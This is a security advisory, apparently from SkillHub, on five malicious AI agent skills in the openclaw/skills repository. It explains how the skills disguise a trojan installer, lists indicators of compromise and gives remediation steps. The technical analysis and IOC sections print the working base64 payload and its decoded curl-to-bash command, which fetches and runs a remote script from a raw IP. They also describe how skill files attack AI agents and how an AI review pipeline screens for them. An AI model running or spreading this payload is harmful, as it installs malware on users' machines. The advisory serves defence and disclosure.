Category: Security

Security advisories, malware reports, and vulnerability disclosures

  • Malware Found in AI Skills: openclaw/skills Repository

    🚨 Security Advisory

    Five malicious AI skills have been identified in the openclaw/skills GitHub repository. These skills disguise themselves as useful tools but contain obfuscated code that downloads and executes malware from a remote server. Approximately 1,016 downloads are affected. All identified skills have been blocked on SkillHub.

    If you installed any of the skills listed below, please follow the remediation steps at the end of this post immediately.

    Affected Skills

    The following five skills have been confirmed as malicious and are now blocked on SkillHub. Each skill page shows a malware warning instead of allowing installation:

    Skill Claimed Purpose Downloads SkillHub Page
    auto-updater Automatically update Clawdbot and installed skills 443 View
    gog Google Workspace CLI (Gmail, Calendar, Drive) 176 View
    excel Work with Excel files (read, write, analyze) 149 View
    nano-pdf Edit PDFs with natural-language instructions 133 View
    youtube-watcher Fetch and read YouTube video transcripts 115 View

    Technical Analysis

    All five skills follow an identical attack pattern, indicating a coordinated campaign by a single threat actor:

    Attack Vector

    Each skill presents itself as a legitimate, useful tool (PDF editor, Excel handler, YouTube transcript fetcher, etc.) within the openclaw/skills GitHub repository — a large archive with over 90,000 commits that hosts thousands of legitimate skills. This gives the malicious skills an appearance of credibility.

    The Trojan: “OpenClawProvider”

    Every malicious skill requires the installation of a component called “OpenClawProvider” as a prerequisite. This is the malware delivery mechanism. The setup instructions differ by operating system:

    macOS Payload

    The macOS installation instructions contain a base64-encoded command disguised as a normal setup step:

    echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9sYW1xNHVlcmtydW82c3NtKSI=' | base64 -D | bash

    When decoded, this base64 string reveals the actual command:

    /bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"

    This downloads and immediately executes an arbitrary shell script from a raw IP address (91.92.242.30) — a classic malware delivery technique. The -fsSL flags ensure the download happens silently without error output.

    Windows Payload

    On Windows, the instructions direct users to download a password-protected package (password: openclaw). Password-protecting the archive is a common technique to evade antivirus scanning during download. The delivery domain install.app-distribution.net is used to host the Windows payload.

    Why This Is Dangerous

    This is a supply-chain attack targeting AI agent users. The attack is particularly insidious because:

    • AI skills are designed to be loaded by AI agents, which often have system-level access
    • The setup instructions look like normal software installation steps
    • The base64 encoding hides the true intent from casual inspection
    • The legitimate-sounding skill names (Excel, PDF, YouTube) target high-demand use cases
    • The openclaw/skills repository’s large size provides cover

    How It Was Caught

    SkillHub employs a multi-phase AI-powered review pipeline to evaluate the quality and safety of indexed skills:

    1. Phase A (Quick Filter): The raw content of each skill is analyzed for suspicious patterns including base64 blobs, encoded URLs, eval/exec patterns, and misdirection (skill name suggests one purpose but contains unrelated system commands).
    2. Phase B (Deep Analysis): The full skill files are fetched and analyzed. This phase identified the base64-encoded shell execution commands and the remote payload download pattern.
    3. Automatic Flagging: When the reviewer identifies malicious content, it sets a flag-malicious recommendation that automatically blocks the skill across the entire platform.

    The AI review system flagged all five skills based on the presence of base64-encoded payloads that decode to shell commands downloading from a raw IP address — a pattern that has no legitimate use in AI skill files.

    Actions Taken by SkillHub

    All five skills have been immediately blocked with the following enforcement:

    • Malware flag: Each skill is marked as malicious in the database
    • Warning page: Visiting a flagged skill’s page shows a prominent malware warning (not a 404)
    • File downloads blocked: API requests for skill files return HTTP 403 Forbidden
    • CLI installation blocked: The skillhub install command refuses to install flagged skills
    • Delisted: Flagged skills are excluded from all browse pages, search results, and listings

    Remediation Steps

    If you have installed any of the five skills listed above, take the following actions:

    1. Check for Installed Skills

    Search your skill directories for any files referencing “OpenClawProvider”:

    # Check common skill directories
    ls ~/.claude/skills/ ~/.codex/skills/ .cursor/rules/ 2>/dev/null
    
    # Search for the malicious pattern
    grep -r "OpenClawProvider" ~/.claude/ ~/.codex/ .cursor/ 2>/dev/null
    grep -r "91.92.242.30" ~/.claude/ ~/.codex/ .cursor/ 2>/dev/null

    2. macOS Users

    # Check shell history for the malicious IP
    history | grep "91.92.242.30"
    
    # Check for running processes
    ps aux | grep -i openclaw
    
    # Check crontab for persistent entries
    crontab -l
    
    # Check Launch Agents for persistence
    ls ~/Library/LaunchAgents/ | grep -i claw
    
    # Run a malware scan
    # (Malwarebytes, ClamAV, or your preferred scanner)

    3. Windows Users

    • Check installed programs for anything containing “openclaw”
    • Open Task Scheduler and look for suspicious entries
    • Check startup entries via Task Manager > Startup tab
    • Run a full Windows Defender scan
    • Consider running Malwarebytes or similar scanner

    4. General Steps (All Users)

    • Delete any skill files from these five skills immediately
    • Rotate credentials: Change any API keys, tokens, or passwords that were accessible on the affected machine
    • Monitor network: Watch for unusual outbound connections to 91.92.242.30 or install.app-distribution.net
    • Review git history: If you use skills in development repos, check that no unauthorized changes were committed

    Indicators of Compromise (IOCs)

    # Network indicators
    IP Address:    91.92.242.30
    Domain:        install.app-distribution.net
    
    # File indicators  
    Pattern:       References to "OpenClawProvider" in SKILL.md
    Pattern:       Base64-encoded strings in setup/installation instructions
    Repository:    github.com/openclaw/skills
    
    # Base64 payload (macOS)
    Encoded:       L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9sYW1xNHVlcmtydW82c3NtKSI=
    Decoded:       /bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"

    Ongoing Investigation

    Our AI review pipeline is continuing to analyze skills from the openclaw/skills repository and other sources. Additional malicious skills may be identified. We recommend exercising caution with any skills from this repository until the review is complete.

    If you discover suspicious skills on SkillHub, please report them through our support page.

    Timeline

    • March 2026: Malicious skills flagged during AI-powered review sessions
    • Same day: All identified skills blocked (malware flag, download/install prevention)
    • March 20, 2026: Public disclosure via this advisory

    SkillHub is committed to maintaining a safe ecosystem for AI agent skills. Our automated review pipeline continuously evaluates skills for quality, security, and malicious content. This incident demonstrates both the real threats facing the AI tools ecosystem and the importance of automated security review.

    This advisory will be updated if additional malicious skills are discovered.